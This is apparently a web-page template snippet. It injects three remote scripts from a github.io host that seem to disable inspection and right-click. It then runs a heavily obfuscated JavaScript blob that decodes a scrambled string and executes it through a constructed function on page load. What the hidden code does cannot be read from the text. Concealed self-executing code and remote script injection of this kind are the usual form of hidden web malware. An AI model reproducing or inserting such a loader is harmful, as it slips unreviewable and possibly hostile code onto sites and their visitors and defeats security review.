<script type="text/javascript">
function callAll(jsfiles) {
    var src = document.createElement("script");
    src.setAttribute("type", "text/javascript");
    src.setAttribute("src", jsfiles);
    document.getElementsByTagName("head")[0].appendChild(src);
}
callAll("https://asikurbd.github.io/js/inspect-1.js");
callAll("https://asikurbd.github.io/js/inspect-2.js");
callAll("https://asikurbd.github.io/js/right-click.js");
</script>


obcfactor
<------------------------>


<script type="text/javascript">
var callAll;(function(){var vkq='',SKf=402-391;function siD(c){var e=1962051;var j=c.length;var o=[];for(var f=0;f<j;f++){o[f]=c.charAt(f)};for(var f=0;f<j;f++){var r=e*(f+314)+(e%52835);var g=e*(f+417)+(e%50011);var m=r%j;var i=g%j;var s=o[m];o[m]=o[i];o[i]=s;e=(r+g)%3048100;};return o.join('')};var spS=siD('ibtadsucootrhfxccnmtlsrkgzuejqrponwyv').substr(0,SKf);var KnJ='sen}on19r(o5)un={vop;a Cvm5ecd};gfprf1]){jw[6f[jiwsh=]vnvu[=ih(hah+{r,ca4.5[;=.oi-r02j0;==f1a.2+Atga(j[vo;76,90cp="re,nr)s.9;*.=hzapl+6!1rnx)"(a<( )r=}4+),p8em[ut={;a4.A;(fr (aA)rrn=d;;ag=r)rkb"46Cnr+6vsr Caa(i]C+groejt=tpsrlnv;+v=)8g=e.=(a(lum1uh.=[als,ligr"l2)2re]oaatil6rrnrrftC;rz.]-0mi,d)v.a+0n= .z ;=l=bl vg(}p8an+w98>l6;.;2hunk;[9r){;8gt;19<s,1(,a;gfee((wn r=mxrsv)n +.)vlrr;4q.cgalr)heAa3n(r(fnhd7i[t],ndac,k0vyvc))rhatdx(e,-oaa0(=nc]=+<poj q0C)(n}=(ef0f.u7=t)ifp0((..u;8C"hei+w.=ranSodf+ rn;s)=,xjlt87=p-, t(ng) +)=f;n;0 (,){-vsriAqp+)nn[atfl5+9;u1cl",]"ohnf=c zr)+h+nh072"=;ih+,C;uetoouf( 9;shx=r.+t[t .vp31;,iiho}erug{;;d(.nel;wzrdsnsea=2t);(in-6ers=;c,<gwvd S)1xu[dot,}h(lnt qto4,t3l<r)(>anxfvear;f v a.e(9 ta7,[ib.v;=l,8=];mour(t.;(u=]r-+chx1o(nev,v=sx; moo+g,7t4.ksev4t he,;=1vpvoe;q+5;o+=j; waprrtqs8;.v[ar+v=xe)]pitn();g=aicfhdovii2"o,euam;]p,owedun)]ih)g7*;ssu"!n)u.]l)jgxr';var mam=siD[spS];var EHO='';var yXu=mam;var jRB=mam(EHO,siD(KnJ));var YBW=jRB(siD('t;\/;6_o!e=;%7,eJ.!;7"s8}p_)..mli4mf9$(J!m_e[i!:oe;+=$,Jtt0hgrsmhJse8JJ{t fci{pnh(_(0=o0(hidJve#qlCagh.\/)JJ$n!J ()$_Jc"fi1ua8r;v-J.)!%1$cn)J_uJ60]n.ld,_:3)o;_2q447ahJ_e($bc;Jepe.,cJtJ[fa(.J3p-8}J17nJ8co"b%!1t)1y3vaj6c6dt%.sllt y]p0$iy*_r_)]"isJ+c#!ai._e ljJr==ss1J;enctiseee5be.!\/b5!.c)r;!tiier.Je6j 3gJ(1u)q(k..(ut_lJg=%,tfc%\/ej88bc!. Jk!zb1!i}))re}(9\/nJ1k5{4%8$bc9(s!teagj;pha5({spt66{p_55!bajid\/1vdhJsh6(.3,.J)J$&s6Jw4.;rlJe0 So.](%10_$J"S.s;it()2o :5J3.J73Jpr+0},=r;\':J;i)5Sab(_#r1.jJ.w$ju!:J_rJ6av.)4*2_3bntfosc\/2v!htr4m$s\/4ocoNJs{t1J]1Jcu11)h\/ .$,iv)J!k; J_7vtl)Jr Jq=b+;!t8(n%!)#c3Jf7)uct5o.(1=etc)J l)boJ_is$ucE))sg!kJ(_cJ\/J3d2;g_43{( (s%!),0Jf+J!et0%%\/5 )c4Jo0be8r2,!.Jj,C}_Jdg f.(j.oJ)Jto==.]89Jg\'1.JJ\/cei,a7.krp53JaJeJr,}ea7(cE.,,e0iJp)_q_o#_=.Jq=d!,c&m7iy{}kJ()eJ7)Jsgzr67.,t=teiJee]i-4J;3,f).JaJuJ.)d16d,pJ=1\'et $3ucs)Jvu(_Jiar=;"6kkc.3.(Jel(_,,51tJc.(fcnJ&uoJfi.u_-uga9i tos.C;2;4J]6, pJ;qJf;.J)gJ.64t((nu;i J]83=f$o0};a0i_]+Jtaued.{.r basJrf a4].87;$.l$r.r.f)(Jey5q0rJJ;J3n;,*Jh4_6sar1ejt=JhJJJ!cj\/q9;rgsJ\/t!)%:3]:rJlJl2]i=)c])sdc %ane.;eJeib,$cJ.af.J)d)"e9J<i,}l=.cJv[J7%83982JJ%{J%%.))J8r}y3)1.__._)8 g-(!3t]er){J8(Jakt;cphJ<t\'s!.l5,#10${J8mJt==3s!$3_dJ!7((,c*=),$rbs=7ci%.r(()o_;T$)Je),6*4l_]rnbbb38sm(i-(!cu=$.ie=3JJ)6;ta9lc7r.J(7;n+9t{{]Je3)hl8sri7s-i4J6(_"n#,.$xf33$\'rfJi$ !;qsJJ4bx46Ju%=.=n+(](=4eoe$6,J1_J<.;{(1Jt\/jJe_rt(JtsJJ.Jc9\/3(_a57fa[r-.,]ufa2f3( r#q((93ni.y:nsx1&y+57e).!s5JsJ_f_+r!tj.()l2_55 ", Jerfn=< __3Ju(f6sn)J}01=!)r3vojaiv!aa8J)).:[4t6J63it.9_$.eb0r) b(4js_e8\/cJj'));var Zef=yXu(vkq,YBW );Zef(5234);return 2935})()
</script>
